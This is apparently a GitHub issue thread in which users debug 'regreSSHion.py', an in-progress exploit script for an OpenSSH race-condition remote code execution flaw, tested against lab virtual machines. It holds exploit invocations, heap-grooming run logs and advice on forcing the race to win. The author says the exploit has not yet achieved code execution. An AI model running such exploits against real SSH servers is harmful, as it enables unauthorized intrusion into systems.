Open BeforeGodKnows opened 2 months ago
l-urk
commented
2 months ago When testing towards a 127.0.0.1 server I noticed that the connection will close prematurely after the handshake.
Try python3 regreSSHion.py --ip 172.17.0.2 --port 22 -x and let me know your results please.
l-urk
commented
2 months ago Also please update to the latest version of the script if you have not already as I'm actively working on it and changes are being made progressively.
BeforeGodKnows
commented
2 months ago Thanks for your reply. I update the script and obtain the below results: python3 regreSSHion.py --ip 172.17.0.2 --port 22 INFO. : attempting to connect to 172.17.0.2:22 (attempt 1) INFO. : connection established INFO. : SSH intitiating handshake INFO. : SSH sent version string. INFO. : SSH received 21 bytes INFO. : SSH handshake successful INFO. : KEX_INIT intitiating handshake INFO. : KEX_INIT sent payload INFO. : KEX_INIT received 1024 bytes INFO. : KEX_INIT handshake successful INFO. : preparing heap INFO. : sent tcache chunk 1
Then, I run this new script with "-x": python3 regreSSHion.py --ip 172.17.0.2 --port 22 -x INFO. : attempting to connect to 172.17.0.2:22 (attempt 1) INFO. : connection established WARN! : -x mode enabled, skipping SSH and KEX_INIT handshake INFO. : preparing heap INFO. : sent tcache chunk 1 INFO. : sent tcache chunk 2 INFO. : sent tcache chunk 3 INFO. : sent tcache chunk 4 INFO. : sent tcache chunk 5 INFO. : sent tcache chunk 6 INFO. : sent tcache chunk 7 INFO. : sent tcache chunk 8 INFO. : sent tcache chunk 9 INFO. : sent tcache chunk 10 INFO. : sent large and small hole pair 1 INFO. : sent large and small hole pair 2 INFO. : sent large and small hole pair 3 INFO. : sent large and small hole pair 4 INFO. : sent large and small hole pair 5 INFO. : sent large and small hole pair 6 INFO. : sent large and small hole pair 7 INFO. : sent large and small hole pair 8 INFO. : sent large and small hole pair 9 INFO. : sent large and small hole pair 10 INFO. : sent large and small hole pair 11 INFO. : sent large and small hole pair 12 INFO. : sent large and small hole pair 13 INFO. : sent large and small hole pair 14 INFO. : sent large and small hole pair 15 INFO. : sent large and small hole pair 16 INFO. : sent large and small hole pair 17 INFO. : sent large and small hole pair 18 INFO. : sent large and small hole pair 19 INFO. : sent large and small hole pair 20 INFO. : sent large and small hole pair 21 INFO. : sent large and small hole pair 22 INFO. : sent large and small hole pair 23 INFO. : sent large and small hole pair 24 INFO. : sent large and small hole pair 25 INFO. : sent large and small hole pair 26 INFO. : sent large and small hole pair 27 INFO. : sent fake file structure 1 INFO. : sent fake file structure 2 INFO. : sent fake file structure 3 INFO. : sent fake file structure 4 INFO. : sent large string INFO. : heap preparation complete INFO. : sock time 0: 0.000000 INFO. : sock time 1: 0.006554 seconds INFO. : sock time 2: 0.000026 seconds INFO. : diff time 0: 0.006528 seconds INFO. : attempting to send final packet ERROR : socket error: [Errno 104] Connection reset by peer, errno: 104 ERROR : Send final packet error: [Errno 104] Connection reset by peer ERROR : payload not sent INFO. : verifying success - sending id command
It also seems like terminating in attempt 1.
l-urk
commented
2 months ago Without -x the program is looking for initial SSH and KEXINIT handshake. Using -x cancels out the initial handshake. It looks like you're sending the entire block of packets and then it is attempting to send the final packet, which is the payload. Try with -r, and if that doesn't work for repeated attempts, manually send until the race condition wins and you're able to send the payload.
Also, are you using an SSH server for the connection server that you're sending the packets to?
whogotpwned
commented
2 weeks ago I have the exact same problem. @l-urk could you provide your tessting environment, that would be really helpful. Tried several environment but can not make the exploit work. Currently I have OpenSSH 9.2 installed on a Debian 12.5.0. Attacker is Kali and the connection between them works, as I test logging in via SSH.
Running the script gives me:
INFO. : attempting to connect to 192.168.56.103:2222 (attempt 1)
INFO. : connection established
INFO. : SSH intitiating handshake
INFO. : SSH sent version string.
INFO. : SSH received 21 bytes
INFO. : SSH handshake successful
INFO. : KEX_INIT intitiating handshake
INFO. : KEX_INIT sent payload
INFO. : KEX_INIT received 1024 bytes
INFO. : KEX_INIT handshake successful
INFO. : preparing heap
INFO. : sent tcache chunk 1 I tried nearly every combination of flags, but does not work. Any ideas?
l-urk
commented
2 weeks ago yeah it's stopping around there for localhost to localhost connection. It will keep going if remote, like separate computer. Try running a second OS and attack that way. Please lmk as it's a work in progress. I haven't hit the RCE yet. If you want to see the payload bytes, run a netcat server, attack it, and send back the ssh banner + a kex init handshake string and regreSSHion will continue with injecting the overflowing w bytes then the shellcode paylad then the id command...
whogotpwned
commented
2 weeks ago yeah it's stopping around there for localhost to localhost connection. It will keep going if remote, like separate computer. Try running a second OS and attack that way. Please lmk as it's a work in progress. I haven't hit the RCE yet. If you want to see the payload bytes, run a netcat server, attack it, and send back the ssh banner + a kex init handshake string and regreSSHion will continue with injecting the overflowing w bytes then the shellcode paylad then the id command...
It is actually a second environment. 2 VMs, First Debian and second is Kali, where Kali is attacking Debian. I will continue testing, thank you for your response.
l-urk
commented
2 weeks ago same pc. You needvtwo PC's for the inject for now. Ill look into an update soon.
whogotpwned
commented
2 weeks ago I am still stuck to attempt 1. Got a vulnerable version on a Xubuntu in 32 bit. Normal SSH Login works again, attacker is Kali Linux in VM on a Windows machine. Definitely two separate machines.
python3 regreSSHion.py --ip 172.17.0.2 --port 22 -z INFO. : attempting to connect to 172.17.0.2:22 (attempt 1) INFO. : connection established INFO. : SSH intitiating handshake INFO. : SSH sent version string. INFO. : SSH received 21 bytes INFO. : SSH handshake successful INFO. : KEX_INIT intitiating handshake INFO. : KEX_INIT sent payload INFO. : KEX_INIT received 1024 bytes INFO. : KEX_INIT handshake successful INFO. : preparing heap INFO. : sent tcache chunk 1
I used your script in Ubuntu 18.04-i386 with Openssh 9.1p1, but obtained the result as above. Then, I used Wireshark to capture the packets, and found that the server sent the {FIN ACK} after Key Exchange Init. I want to seek help for the reason I met. Or could u please provide your test environment?